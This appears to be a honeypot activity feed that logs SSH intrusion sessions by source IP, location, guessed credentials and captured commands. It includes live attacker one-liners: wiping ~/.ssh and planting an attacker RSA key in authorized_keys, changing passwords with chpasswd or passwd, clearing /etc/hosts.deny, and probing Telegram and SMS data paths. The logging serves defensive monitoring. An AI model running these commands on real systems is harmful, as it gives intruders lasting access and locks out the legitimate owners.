2026-05-08 07:55 EDT ยท as oracle/Abcd1234, oracle/founderbn, oracle/manager
file attribute tampering โ†’ SSH key persistence (repeated file attribute tampering 4x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—4
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—4
โ†ณ SSH key persistence
๐ŸŽญ sneaky_batik_root (103.172.20.218) โ€” Rengasdengklok, Indonesia ยท 4 sessions ยท 8 cmds
2026-05-08 08:24 EDT ยท as oracle/Abcd1234, oracle/founderbn, oracle/manager
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—4
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—4
โ†ณ SSH key persistence
๐ŸŽญ rabid_lantern_root_150 (47.97.126.150) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-05-08 07:18 EDT ยท as deploy/deploy
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ brazen_neon_root (219.78.63.235) โ€” Ho Man Tin, Hong Kong ยท 1 session ยท 9 cmds
2026-05-08 06:55 EDT ยท as root/root
root/root login โ†’ /ip cloud print network topology โ†’ ifconfig interface enumeration โ†’ uname -a OS fingerprinting โ†’ cat /proc/cpuinfo hardware profiling โ†’ ps grep miner process detection โ†’ Telegram data directory reconnaissance โ†’ locate specific hash scan โ†’ echo Hi command execution
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ brazen_wok_root_82 (114.55.129.82) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-05-08 06:30 EDT ยท as deploy/deploy123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ silent_falcon_root (83.168.110.85) โ€” Warsaw, Poland ยท 32 sessions ยท 32 cmds
2026-05-08 03:57 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 32x across 32 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—32
๐ŸŽญ listless_cowboy_root_44 (67.205.178.44) โ€” North Bergen, United States ยท 2 sessions ยท 21 cmds
2026-05-07 23:36 EDT ยท as oracle/qweasd, root/admin123
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:A6tqDuypdWNd"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ rabid_panda_root_191 (182.43.164.191) โ€” Jinan, China ยท 1 session ยท 2 cmds
2026-05-07 23:07 EDT ยท as oracle/123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ listless_panda_root_182 (152.136.57.182) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-07 23:05 EDT ยท as pi/pi
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ baroque_neon_root (165.154.6.126) โ€” Hong Kong, Hong Kong ยท 1 session ยท 2 cmds
2026-05-07 23:02 EDT ยท as oracle/q1w2e3r4
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ lurking_lantern_root (14.103.118.140) โ€” Haidian, China ยท 1 session ยท 2 cmds
2026-05-07 20:59 EDT ยท as oracle/manager123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ sullen_star_root_6 (20.12.41.6) โ€” Boydton, United States ยท 1 session ยท 20 cmds
2026-05-07 20:33 EDT ยท as guest/guest
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "guest\nO55i6UqHwcFE\nO55i6UqHwcFE"|passwd|bash
$ Enter new UNIX password:
$ echo "guest\nO55i6UqHwcFE\nO55i6UqHwcFE\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ cryptic_silk_root_14 (14.22.81.14) โ€” Guangzhou, China ยท 1 session ยท 1 cmd
2026-05-07 20:19 EDT ยท as root/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ spectral_panda (8.148.200.68) โ€” Guangzhou, China ยท 1 session ยท 1 cmd
2026-05-07 18:47 EDT ยท as deploy/deploy
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ midnight_sakura_root (43.163.195.170) โ€” Tokyo, Japan ยท 1 session ยท 1 cmd
2026-05-07 18:41 EDT ยท as pi/raspberry
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ scrappy_peak_root (154.92.17.58) โ€” Chai Wan, Hong Kong ยท 2 sessions ยท 4 cmds
2026-05-07 16:21 EDT ยท as oracle/Oracle1, oracle/asd123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ sneaky_gouda_root (185.246.188.74) โ€” Amsterdam, The Netherlands ยท 1 session ยท 3 cmds
2026-05-07 16:58 EDT ยท as admin/admin
CPU profiling โ†’ CPU profiling โ†’ ?
$ echo "bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778187522019985778" | sh
โ†ณ CPU profiling
$ bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778187522019985778
โ†ณ CPU profiling
$
๐ŸŽญ scrappy_windmill_root (34.90.210.134) โ€” Groningen, Netherlands ยท 1 session ยท 1 cmd
2026-05-07 16:11 EDT ยท as mysql/mysql
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ brazen_bibimbap_root_22 (49.247.37.22) โ€” Gwangmyeong, South Korea ยท 1 session ยท 2 cmds
2026-05-07 13:53 EDT ยท as oracle/tft105
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ rusty_liberty_root_177 (172.208.48.177) โ€” Boydton, United States ยท 1 session ยท 2 cmds
2026-05-07 13:51 EDT ยท as oracle/tft105
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ glitchy_clog_sol (176.65.139.153) โ€” Eygelshoven, The Netherlands ยท 15 sessions ยท 15 cmds
2026-05-07 12:55 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 15x across 15 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—15
๐ŸŽญ hollow_cactus_root (187.170.239.22) โ€” Cuauhtรฉmoc, Mexico ยท 1 session ยท 2 cmds
2026-05-07 13:25 EDT ยท as oracle/11111111
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ nocturnal_neon_root (47.83.131.134) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-05-07 12:09 EDT ยท as user/user
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ jittery_clog_root_51 (192.42.116.51) โ€” Amsterdam, The Netherlands ยท 1 session ยท 3 cmds
2026-05-07 09:13 EDT ยท as admin/admin
CPU profiling โ†’ CPU profiling โ†’ ?
$ echo "bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778159599880105606" | sh
โ†ณ CPU profiling
$ bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778159599880105606
โ†ณ CPU profiling
$
๐ŸŽญ sneaky_dragonfruit_root (58.186.20.143) โ€” Ho Chi Minh City, Vietnam ยท 1 session ยท 2 cmds
2026-05-07 08:58 EDT ยท as oracle/oracle@1
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ stoic_jade_root (8.129.135.162) โ€” Shenzhen, China ยท 1 session ยท 1 cmd
2026-05-07 08:45 EDT ยท as pi/pi
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ stoic_pampas_root (186.38.26.5) โ€” Sierra Grande, Argentina ยท 1 session ยท 2 cmds
2026-05-07 08:31 EDT ยท as oracle/oracle2024
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ crimson_dragon_root (180.110.149.157) โ€” Nanjing, China ยท 1 session ยท 20 cmds
2026-05-07 08:20 EDT ยท as oracle/oracleadmin
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "oracleadmin\nbdOUB8QU2O3K\nbdOUB8QU2O3K"|passwd|bash
$ Enter new UNIX password:
$ echo "oracleadmin\nbdOUB8QU2O3K\nbdOUB8QU2O3K\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ rusty_sultan_root_73 (45.92.219.73) โ€” Istanbul, Tรผrkiye ยท 1 session ยท 1 cmd
2026-05-07 06:18 EDT ยท as root/password
echo
$ echo TEST
๐ŸŽญ murky_carnival_root (177.41.192.124) โ€” Mogi das Cruzes, Brazil ยท 1 session ยท 2 cmds
2026-05-07 06:16 EDT ยท as oracle/system
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ spectral_kopi_root (103.20.122.54) โ€” Singapore, Singapore ยท 1 session ยท 2 cmds
2026-05-07 06:14 EDT ยท as oracle/iflytek
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ sneaky_dragon_root_58 (116.153.81.58) โ€” Nanchang, China ยท 1 session ยท 20 cmds
2026-05-07 05:46 EDT ยท as oracle/iflytek
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "iflytek\nfKBDWgi7BQAF\nfKBDWgi7BQAF"|passwd|bash
$ Enter new UNIX password:
$ echo "iflytek\nfKBDWgi7BQAF\nfKBDWgi7BQAF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ sullen_mekong_root_33 (103.78.1.33) โ€” Thanh Xuรขn, Vietnam ยท 1 session ยท 2 cmds
2026-05-07 02:00 EDT ยท as oracle/welcome1
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
